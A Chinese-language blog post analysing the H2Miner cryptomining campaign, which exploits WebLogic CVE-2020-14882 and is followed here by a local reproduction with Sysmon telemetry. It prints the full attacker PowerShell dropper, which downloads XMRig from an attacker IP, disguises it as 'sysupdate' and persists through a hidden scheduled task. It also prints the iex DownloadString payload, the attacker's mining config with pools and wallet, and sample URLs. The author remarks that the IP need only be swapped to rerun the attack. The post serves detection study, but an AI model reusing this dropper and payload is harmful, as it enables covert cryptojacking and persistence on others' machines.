活跃的H2Miner组织挖矿分析,含样本本地复现【EDR 经典case】

双平台传播——活跃的H2Miner组织挖矿分析

https://www.antiy.cn/research/notice&report/research_report/20211117.html
 
攻击者利用漏洞入侵Windows平台和Linux平台。在Windows平台中,失陷主机下载并执行wbw.xml的XML文件,在XML文件中执行一段PowerShell命令,下载名为1.ps1的脚本,该脚本下载挖矿程序以及挖矿的配置文件并重命名执行,创建计划任务每30分钟执行一次1.ps1脚本,实现持久化长期驻留失陷主机;在Linux平台中,失陷主机下载并执行名为wb.xml的XML文件,该XML文件使用同样的手法内嵌了一段bash脚本,执行后下载挖矿脚本,主要功能包括清除竞品挖矿程序和计划任务、MD5校验、卸载安全软件和下载Kinsing恶意软件并执行等。Kinsing恶意软件不仅具有挖矿功能,还会在失陷主机上开放后门以及masscan端口扫描等功能,连接C2服务器上传版本号、内核数量、内存信息、操作系统信息、是否获得 Root 权限和Uuid等信息,并会下载后续脚本进行横向移动等。

图3-1 整体攻击流程


 

原理:

通过攻击者利用了WebLogic RCE漏洞(CVE-2020-14882),调用images目录来利用CVE-2020-14882,这使他们可以在服务器上执行任意命令。他们利用此漏洞下载并执行了一个xml文件,其中包括一个用于下载和执行脚本的PowerShell命令。该脚本执行多项操作,例如下载XMRig及其配置文件,并将XMRig重命名为sysupdate,为更新过程安排任务,并确认矿机正在运行。

1、初始访问

威胁人员利用CVE-2020-14882执行了一个名为wbw的xml文件

 

 

 

 关键payload:

powershell.exe "Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('http://95.142.39.135/1.ps1'))"

 

2、执行过程

在1的请求包中,威胁人员执行了wbw.xml文件,该文件会下载并执行1.ps1文件(https://s.threatbook.cn/report/file/58bb90f11070a114442c4fa1cbbccefadcdf954510ae2b8d91c9b22b1a8a42d5,微步里的下载位置)。脚本完整内容,注意,目前95.142.39.135这个IP已经不再生效了,要复现攻击的话,需要自己更换下IP:

$ne = $MyInvocation.MyCommand.Path
$miner_url = "http://95.142.39.135/xmrig.exe"
$miner_url_backup = "http://95.142.39.135/xmrig.exe"
$miner_size = 4578304
$miner_name = "sysupdate"
$miner_cfg_url = "http://95.142.39.135/config.json"
$miner_cfg_url_backup = "http://95.142.39.135/config.json"
$miner_cfg_size = 3714
$miner_cfg_name = "config.json"


$miner_path = "$env:TMP\sysupdate.exe"
$miner_cfg_path = "$env:TMP\config.json"
$payload_path = "$env:TMP\update.ps1"

function Update($url,$backup_url,$path,$proc_name)
 {
    Get-Process -Name $proc_name | Stop-Process
    Remove-Item $path
    Try {
        $vc = New-Object System.Net.WebClient
        $vc.DownloadFile($url,$path)
    }
    Catch {
        Write-Output "donwload with backurl"
        $vc = New-Object System.Net.WebClient
        $vc.DownloadFile($backup_url,$path)
    }
}

#miner_path
if((Test-Path $miner_path))
{
    Write-Output "miner file exist"
    if((Get-Item $miner_path).length -ne $miner_size)
    {
        Update $miner_url $miner_url_backup $miner_path $miner_name
    }
}
else {
    Update $miner_url $miner_url_backup $miner_path $miner_name
}
#miner_cfg_path
if((Test-Path $miner_cfg_path))
{
    Write-Output "miner_cfg file exist"
    if((Get-Item $miner_cfg_path).length -ne $miner_cfg_size)
    {
        Update $miner_cfg_url $miner_cfg_url_backup $miner_cfg_path $miner_cfg_name
    }
}
else {
    Update $miner_cfg_url $miner_cfg_url_backup $miner_cfg_path $miner_cfg_name
}

Remove-Item $payload_path
Remove-Item $HOME\update.ps1
Try {
    $vc = New-Object System.Net.WebClient
    $vc.DownloadFile($payload_url,$payload_path)
}
Catch {
    Write-Output "download with backurl"
    $vc = New-Object System.Net.WebClient
    $vc.DownloadFile($payload_url_backup,$payload_path)
}
echo F | xcopy /y $payload_path $HOME\update.ps1

SchTasks.exe /Create /SC MINUTE /TN "Update service for Windows Service" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -File $HOME\update.ps1" /MO 30 /F
if(!(Get-Process $miner_name -ErrorAction SilentlyContinue))
{
    Write-Output "Miner Not running"
	Start-Process $miner_path -windowstyle hidden
}
else
{
	Write-Output "Miner Running"
}

Start-Sleep 5

 

 

该脚本通过初始化miner_url等参数来确定xmrig文件及其配置文件config.json的下载位置,

The script starts off by setting parameters, such as the download locations for XMRig and its config.

 

config.json文件完整内容,该文件也可以从微步里下载,https://s.threatbook.cn/report/file/6be51ca6e829c4033d74feff743bcc0d3dc26cb13f687fe6c0d2f6169a8197b2:

{
  "api": {
    "id": null,
    "worker-id": null
  },
  "http": {
    "enabled": false,
    "host": "127.0.0.1",
    "port": 0,
    "access-token": null,
    "restricted": true
  },
  "autosave": true,
  "background": true,
  "colors": true,
  "title": true,
  "randomx": {
    "init": -1,
    "mode": "auto",
    "1gb-pages": false,
    "rdmsr": true,
    "wrmsr": true,
    "cache_qos": false,
    "numa": true,
    "scratchpad_prefetch_mode": 1
  },
  "cpu": {
    "enabled": true,
    "huge-pages": true,
    "huge-pages-jit": false,
    "hw-aes": null,
    "priority": null,
    "memory-pool": false,
    "yield": true,
    "max-threads-hint": 100,
    "asm": true,
    "argon2-impl": null,
    "astrobwt-max-size": 550,
    "cn/0": false,
    "cn-lite/0": false,
    "kawpow": false
  },
  "opencl": {
    "enabled": false,
    "cache": true,
    "loader": null,
    "platform": "AMD",
    "adl": true,
    "cn/0": false,
    "cn-lite/0": false
  },
  "cuda": {
    "enabled": false,
    "loader": null,
    "nvml": true,
    "cn/0": false,
    "cn-lite/0": false
  },
  "donate-level": 1,
  "donate-over-proxy": 1,
  "log-file": null,
  "pools": [
    {
      "algo": null,
      "coin": null,
      "url": "45.136.244.146:3333",
      "user": "4ASk4RhUyLL7sxE9cPyBiXb82ofekJg2SKiv4MKtCbzwHHLQxVVfVr4D4xhQHyyMTieSM5VUFGR9jZVR5gp6sa1Q2p8SahC",
      "pass": "x",
      "rig-id": null,
      "nicehash": false,
      "keepalive": false,
      "enabled": true,
      "tls": false,
      "tls-fingerprint": null,
      "daemon": false,
      "socks5": null,
      "self-select": null
    },
    {
      "algo": null,
      "coin": null,
      "url": "37.59.44.193:3333",
      "user": "4ASk4RhUyLL7sxE9cPyBiXb82ofekJg2SKiv4MKtCbzwHHLQxVVfVr4D4xhQHyyMTieSM5VUFGR9jZVR5gp6sa1Q2p8SahC",
      "pass": "x",
      "rig-id": null,
      "nicehash": false,
      "keepalive": false,
      "enabled": true,
      "tls": false,
      "tls-fingerprint": null,
      "daemon": false,
      "socks5": null,
      "self-select": null
    },
    {
      "algo": null,
      "coin": null,
      "url": "94.23.23.52:3333",
      "user": "4ASk4RhUyLL7sxE9cPyBiXb82ofekJg2SKiv4MKtCbzwHHLQxVVfVr4D4xhQHyyMTieSM5VUFGR9jZVR5gp6sa1Q2p8SahC",
      "pass": "x",
      "rig-id": null,
      "nicehash": false,
      "keepalive": false,
      "enabled": true,
      "tls": false,
      "tls-fingerprint": null,
      "daemon": false,
      "socks5": null,
      "self-select": null
    },
    {
      "algo": null,
      "coin": null,
      "url": "pool.minexmr.com:3333",
      "user": "4ASk4RhUyLL7sxE9cPyBiXb82ofekJg2SKiv4MKtCbzwHHLQxVVfVr4D4xhQHyyMTieSM5VUFGR9jZVR5gp6sa1Q2p8SahC",
      "pass": "x",
      "rig-id": null,
      "nicehash": false,
      "keepalive": false,
      "enabled": true,
      "tls": false,
      "tls-fingerprint": null,
      "daemon": false,
      "socks5": null,
      "self-select": null
    },
    {
      "algo": null,
      "coin": null,
      "url": "pool.supportxmr.com:3333",
      "user": "4ASk4RhUyLL7sxE9cPyBiXb82ofekJg2SKiv4MKtCbzwHHLQxVVfVr4D4xhQHyyMTieSM5VUFGR9jZVR5gp6sa1Q2p8SahC",
      "pass": "x",
      "rig-id": null,
      "nicehash": false,
      "keepalive": false,
      "enabled": true,
      "tls": false,
      "tls-fingerprint": null,
      "daemon": false,
      "socks5": null,
      "self-select": null
    }
  ],
  "print-time": 60,
  "health-print-time": 60,
  "retries": 5,
  "retry-pause": 5,
  "syslog": false,
  "tls": {
    "enabled": false,
    "protocols": null,
    "cert": null,
    "cert_key": null,
    "ciphers": null,
    "ciphersuites": null,
    "dhparam": null
  },
  "user-agent": null,
  "verbose": 0,
  "watch": true,
  "pause-on-battery": false
}

 

 

The script then downloads and executes XMRig, renames it to sysupdate and then sets a schedule task, which runs update.ps1. There was no script located in this directory but we assume one would show up when the miner needed to be updated, if the threat actor still had access.

 

 

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN "Update service for Windows Service" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -File C:\Users\Administrator\update.ps1" /MO 30 /F

Defense Evasion

The script renamed xmrig.exe to sysupdate in attempt to hide itself.

 

 

Impact

The server’s CPU was maxed out at 100% and likely would have caused issues in an enterprise environment. At the time of this writing the wallet used for mining barely had anything in it and appears to be dedicated to us.

 

 
该组织在Windows平台上传播挖门罗币的程序,该程序使用开源挖矿程序xmrig.exe进行挖矿,版本号为6.4.0,目前配置文件中的钱包地址已被各大矿池封禁。
xmrig的下载地址,https://s.threatbook.cn/report/file/5e5b5171a95955ecb0fa8f9f1ba66f313165044cc1978a447673c0ac17859170
我用后面的挖矿命令行,本地运行了下,的确是可以运行的。
 
 
开源xmrig挖矿下载地址: https://github.com/xmrig/xmrig/releases
 
用下面的命令可以看到挖矿(用的example例子):
xmrig.exe -o pool.hashvault.pro:3333 -u 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD -p x

 可以看到CPU占用情况:

 

 CPU占用60%。用的是6个线程在挖。

一开始挖矿的时候,磁盘占用会非常高!

 

 

 

 控制台打印结果:

D:\下载\xmrig-6.18.0-msvc-win64\xmrig-6.18.0>xmrig.exe -o pool.hashvault.pro:3333 -u 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD -p x
 * ABOUT        XMRig/6.18.0 MSVC/2019
 * LIBS         libuv/1.44.1 OpenSSL/1.1.1o hwloc/2.7.1
 * HUGE PAGES   permission granted
 * 1GB PAGES    unavailable
 * CPU          11th Gen Intel(R) Core(TM) i5-11400 @ 2.60GHz (1) 64-bit AES
                L2:3.0 MB L3:12.0 MB 6C/12T NUMA:1
 * MEMORY       10.9/15.7 GB (69%)
                Controller0-ChannelA-DIMM0: 16 GB DDR4 @ 2933 MHz M378A2G43AB3-CWE
                Controller0-ChannelB-DIMM0: <empty>
 * MOTHERBOARD  LENOVO - 3730
 * DONATE       1%
 * ASSEMBLY     auto:intel
 * POOL #1      pool.hashvault.pro:3333 algo auto
 * COMMANDS     hashrate, pause, resume, results, connection
 * OPENCL       disabled
 * CUDA         disabled
[2022-07-03 20:06:53.731]  net      use pool pool.hashvault.pro:3333  125.253.92.50
[2022-07-03 20:06:53.732]  net      new job from pool.hashvault.pro:3333 diff 72000 algo rx/0 height 2659226 (11 tx)
[2022-07-03 20:06:53.732]  cpu      use argon2 implementation AVX-512F
[2022-07-03 20:06:53.733]  msr      to access MSR registers Administrator privileges required.
[2022-07-03 20:06:53.733]  msr      FAILED TO APPLY MSR MOD, HASHRATE WILL BE LOW
[2022-07-03 20:06:53.733]  randomx  init dataset algo rx/0 (12 threads) seed 9cfa17830fb15f71...
[2022-07-03 20:06:53.737]  randomx  allocated 2336 MB (2080+256) huge pages 0% 0/1168 +JIT (4 ms)
[2022-07-03 20:06:58.179]  randomx  dataset ready (4442 ms)
[2022-07-03 20:06:58.179]  cpu      use profile  rx  (6 threads) scratchpad 2048 KB
[2022-07-03 20:06:58.201]  cpu      READY threads 6/6 (6) huge pages 0% 0/6 memory 12288 KB (22 ms)
[2022-07-03 20:07:00.252]  net      new job from pool.hashvault.pro:3333 diff 116758 algo rx/0 height 2659226 (11 tx)
[2022-07-03 20:07:20.646]  cpu      accepted (1/0) diff 116758 (245 ms)
[2022-07-03 20:07:25.083]  net      new job from pool.hashvault.pro:3333 diff 116758 algo rx/0 height 2659227 (24 tx)
[2022-07-03 20:07:58.245]  miner    speed 10s/60s/15m 983.1 n/a n/a H/s max 1046.2 H/s
[2022-07-03 20:08:00.250]  net      new job from pool.hashvault.pro:3333 diff 52290 algo rx/0 height 2659227 (24 tx)
[2022-07-03 20:08:02.102]  cpu      accepted (2/0) diff 52290 (261 ms)
[2022-07-03 20:08:44.705]  net      new job from pool.hashvault.pro:3333 diff 52290 algo rx/0 height 2659228 (21 tx)
[2022-07-03 20:08:50.266]  net      new job from pool.hashvault.pro:3333 diff 52290 algo rx/0 height 2659229 (4 tx)
[2022-07-03 20:08:58.300]  miner    speed 10s/60s/15m 1043.0 1039.9 n/a H/s max 1063.6 H/s
[2022-07-03 20:09:00.260]  net      new job from pool.hashvault.pro:3333 diff 40260 algo rx/0 height 2659229 (4 tx)
[2022-07-03 20:09:53.588]  cpu      accepted (3/0) diff 40260 (246 ms)
[2022-07-03 20:09:58.370]  miner    speed 10s/60s/15m 907.4 936.8 n/a H/s max 1063.6 H/s
[2022-07-03 20:10:00.234]  net      new job from pool.hashvault.pro:3333 diff 33570 algo rx/0 height 2659229 (4 tx)
[2022-07-03 20:10:51.734]  net      new job from pool.hashvault.pro:3333 diff 33570 algo rx/0 height 2659229 (50 tx)
[2022-07-03 20:10:58.442]  miner    speed 10s/60s/15m 936.3 909.4 n/a H/s max 1063.6 H/s
[2022-07-03 20:11:00.237]  net      new job from pool.hashvault.pro:3333 diff 25410 algo rx/0 height 2659229 (50 tx)
[2022-07-03 20:11:07.161]  cpu      accepted (4/0) diff 25410 (272 ms)
[2022-07-03 20:11:10.551]  cpu      accepted (5/0) diff 25410 (266 ms)
[2022-07-03 20:11:39.597]  cpu      accepted (6/0) diff 25410 (288 ms)
[2022-07-03 20:11:58.503]  miner    speed 10s/60s/15m 943.3 977.0 n/a H/s max 1063.6 H/s
[2022-07-03 20:12:00.252]  net      new job from pool.hashvault.pro:3333 diff 27900 algo rx/0 height 2659229 (50 tx)
[2022-07-03 20:12:03.991]  cpu      accepted (7/0) diff 27900 (271 ms)
[2022-07-03 20:12:11.433]  net      new job from pool.hashvault.pro:3333 diff 27900 algo rx/0 height 2659230 (11 tx)
[2022-07-03 20:12:45.558]  cpu      accepted (8/0) diff 27900 (261 ms)
[2022-07-03 20:12:55.501]  net      new job from pool.hashvault.pro:3333 diff 27900 algo rx/0 height 2659231 (23 tx)
[2022-07-03 20:12:58.564]  miner    speed 10s/60s/15m 956.2 959.2 n/a H/s max 1063.6 H/s
[2022-07-03 20:12:59.875]  net      new job from pool.hashvault.pro:3333 diff 27900 algo rx/0 height 2659232 (1 tx)
[2022-07-03 20:13:07.999]  cpu      accepted (9/0) diff 27900 (262 ms)
[2022-07-03 20:13:19.714]  cpu      accepted (10/0) diff 27900 (260 ms)
[2022-07-03 20:13:58.633]  miner    speed 10s/60s/15m 823.7 860.9 n/a H/s max 1063.6 H/s
[2022-07-03 20:14:56.582]  net      new job from pool.hashvault.pro:3333 diff 27960 algo rx/0 height 2659233 (40 tx)
[2022-07-03 20:14:58.687]  miner    speed 10s/60s/15m 990.3 943.5 n/a H/s max 1063.6 H/s
[2022-07-03 20:15:00.226]  net      new job from pool.hashvault.pro:3333 diff 24510 algo rx/0 height 2659233 (40 tx)
[2022-07-03 20:15:51.945]  cpu      accepted (11/0) diff 24510 (274 ms)
[2022-07-03 20:15:58.744]  miner    speed 10s/60s/15m 1009.9 960.9 n/a H/s max 1063.6 H/s
[2022-07-03 20:16:00.231]  net      new job from pool.hashvault.pro:3333 diff 23130 algo rx/0 height 2659233 (40 tx)
[2022-07-03 20:16:04.137]  cpu      accepted (12/0) diff 23130 (254 ms)
[2022-07-03 20:16:18.237]  cpu      accepted (13/0) diff 23130 (262 ms)
[2022-07-03 20:16:31.066]  signal   Ctrl+C received, exiting
[2022-07-03 20:16:31.072]  cpu      stopped (5 ms)

 

攻击事件样本整理

        根据攻击事件对样本进行梳理得到如下信息:

表3-1 攻击事件样本整理

样本下载地址

详细说明

hxxp[:]//194.38.20.199/1.ps1

Windows恶意PowerShell

hxxp[:]//194.38.20.199/xmrig.exe

Windows门罗币挖矿程序

hxxp[:]//194.38.20.199/config.json

Windows挖矿配置文件

hxxp[:]//194.38.20.199/md.sh

Linux恶意shell

hxxp[:]//194.38.20.199/kinsing

Linux挖矿程序

hxxp[:]//194.38.20.199/spre.sh

横向移动脚本

hxxp[:]//194.38.20.199/wb.xml

Weblogic RCE payload(Linux)

hxxp[:]//194.38.20.199/wbw.xml

Weblogic RCE payload (Windows)

 

表3-2 Windows挖矿配置文件中的矿池和钱包地址

矿池地址

钱包地址

45.136.244.146:3333

4ASk4RhUyLL7sxE9cPyBiXb82ofekJg2SKiv4MKtCbzwHHLQx

VVfVr4D4xhQHyyMTieSM5VUFGR9jZVR5gp6sa1Q2p8SahC

37.59.44.193:3333

94.23.23.52:3333

pool.minexmr.com:3333

pool.supportxmr.com:3333

微步和华为情报均可查询:

 

File

xmrig.exe
57f0fdec4d919db0bd4576dc84aec752
82e6af04eadb5fac25fbb89dc6f020da0f4b6dca
5e5b5171a95955ecb0fa8f9f1ba66f313165044cc1978a447673c0ac17859170
1.ps1
70000d52dc3ad153464dc41891c10439
9bd2bc3f87d4c9d029a4e6391358f776e86ad2d5
58bb90f11070a114442c4fa1cbbccefadcdf954510ae2b8d91c9b22b1a8a42d5
wbw.xml
fe0f332ed847a25a18cd63dfdaf69908
67ff54a71dfc5b817fbc6e62c6c30e9a30219fb9
c8fd12490f9251080803a68e26a1bdb1919811334ec54ab194645bd516adf1c1
config.json
2d9a06afe4263530b900aa1c96a84665
0c86e66105645700b08d33e793362de41d0b1878
6be51ca6e829c4033d74feff743bcc0d3dc26cb13f687fe6c0d2f6169a8197b2

 

 

好了,有了所有的样本,接下来我们本地复现下该挖矿的攻击了。

 

Create a HTTP server with one command thanks to Python
  1. Open a terminal window.
  2. Navigate to the directory you want to have the root directory.
  3. Execute the command to start the server.
  4. Python 2 — python -m SimpleHTTPServer 8000.
  5. Python 3 — python -m http.server 8000.

 

使用python运行:

 python -m http.server 80

 浏览器打开http://localhost,可以看到:

 

先修改下config.json里的内容,IP换一下成127.0.0.1:

$ne = $MyInvocation.MyCommand.Path
$miner_url = "http://127.0.0.1/xmrig.exe"
$miner_url_backup = "http://127.0.0.1/xmrig.exe"
$miner_size = 4578304
$miner_name = "sysupdate"
$miner_cfg_url = "http://127.0.0.1/config.json"
$miner_cfg_url_backup = "http://127.0.0.1/config.json"
$miner_cfg_size = 3714
$miner_cfg_name = "config.json"

 然后命令行执行:

 powershell.exe "Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('http://127.0.0.1/1.ps1'))"

 

然后就看到在挖矿了:

 

我们看下sysmon数据采集:

Network connection detected:
RuleName: Usermode
UtcTime: 2022-07-03 13:33:31.628
ProcessGuid: {0bf95bee-9aab-62c1-4401-000000001000}
ProcessId: 8128
Image: C:\Users\bonel\AppData\Local\Temp\sysupdate.exe
User: DESKTOP-92JS9SJ\bonel
Protocol: tcp
Initiated: true
SourceIsIpv6: false
SourceIp: 10.0.2.15
SourceHostname: -
SourcePort: 50000
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 45.136.244.146
DestinationHostname: -
DestinationPort: 3333

看来矿池用的是:45.136.244.146

Process Create:
RuleName: -
UtcTime: 2022-07-03 13:33:31.441
ProcessGuid: {0bf95bee-9aab-62c1-4401-000000001000}
ProcessId: 8128
Image: C:\Users\bonel\AppData\Local\Temp\sysupdate.exe
FileVersion: 6.4.0
Description: XMRig miner
Product: XMRig
Company: www.xmrig.com
OriginalFileName: xmrig.exe
CommandLine: "C:\Users\bonel\AppData\Local\Temp\sysupdate.exe" 
CurrentDirectory: C:\Users\bonel\h2miner\
User: DESKTOP-92JS9SJ\bonel
LogonGuid: {0bf95bee-9875-62c1-2493-0a0000000000}
LogonId: 0xA9324
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=57F0FDEC4D919DB0BD4576DC84AEC752,SHA256=5E5B5171A95955ECB0FA8F9F1BA66F313165044CC1978A447673C0AC17859170,IMPHASH=85614AD7B23A2780453C1947D2A3D660
ParentProcessGuid: {0bf95bee-9aaa-62c1-4101-000000001000}
ParentProcessId: 7972
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: powershell.exe  "Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('http://127.0.0.1/1.ps1'))"
ParentUser: DESKTOP-92JS9SJ\bonel

 可以看到是powershell里启动的sysupdate.exe

Process Create:
RuleName: -
UtcTime: 2022-07-03 13:33:31.361
ProcessGuid: {0bf95bee-9aab-62c1-4301-000000001000}
ProcessId: 8100
Image: C:\Windows\System32\schtasks.exe
FileVersion: 10.0.19041.1503 (WinBuild.160101.0800)
Description: Task Scheduler Configuration Tool
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: schtasks.exe
CommandLine: "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /TN "Update service for Windows Service" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -File C:\Users\bonel\update.ps1" /MO 30 /F
CurrentDirectory: C:\Users\bonel\h2miner\
User: DESKTOP-92JS9SJ\bonel
LogonGuid: {0bf95bee-9875-62c1-2493-0a0000000000}
LogonId: 0xA9324
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=76CD6626DD8834BD4A42E6A565104DC2,SHA256=013C013E0EFD13C9380FAD58418B7ACA8356E591A5CCEFFDB910F7D8B0AD28EF,IMPHASH=ECCE05491F2E8F279F4790BCB1318C05
ParentProcessGuid: {0bf95bee-9aaa-62c1-4101-000000001000}
ParentProcessId: 7972
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: powershell.exe  "Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('http://127.0.0.1/1.ps1'))"
ParentUser: DESKTOP-92JS9SJ\bonel

 另外还复制了一个临时文件:

Process Create:
RuleName: -
UtcTime: 2022-07-03 13:33:31.348
ProcessGuid: {0bf95bee-9aab-62c1-4201-000000001000}
ProcessId: 8076
Image: C:\Windows\System32\xcopy.exe
FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
Description: Extended Copy Utility
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: XCOPY.EXE
CommandLine: "C:\Windows\system32\xcopy.exe" /y C:\Users\bonel\AppData\Local\Temp\update.ps1 C:\Users\bonel\update.ps1
CurrentDirectory: C:\Users\bonel\h2miner\
User: DESKTOP-92JS9SJ\bonel
LogonGuid: {0bf95bee-9875-62c1-2493-0a0000000000}
LogonId: 0xA9324
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=39FBFD3AF58238C6F9D4D408C9251FF5,SHA256=269EB0728413654856F4B2EE1FA7838CD69672EBC11BAED4CAA63F58C2DF5823,IMPHASH=1EFFE65A4F251E4AE9FA8551F9FCDABB
ParentProcessGuid: {0bf95bee-9aaa-62c1-4101-000000001000}
ParentProcessId: 7972
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: powershell.exe  "Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('http://127.0.0.1/1.ps1'))"
ParentUser: DESKTOP-92JS9SJ\bonel

 

 

 

 

 
posted @ 2022-06-15 12:13  bonelee  阅读(729)  评论(0编辑  收藏  举报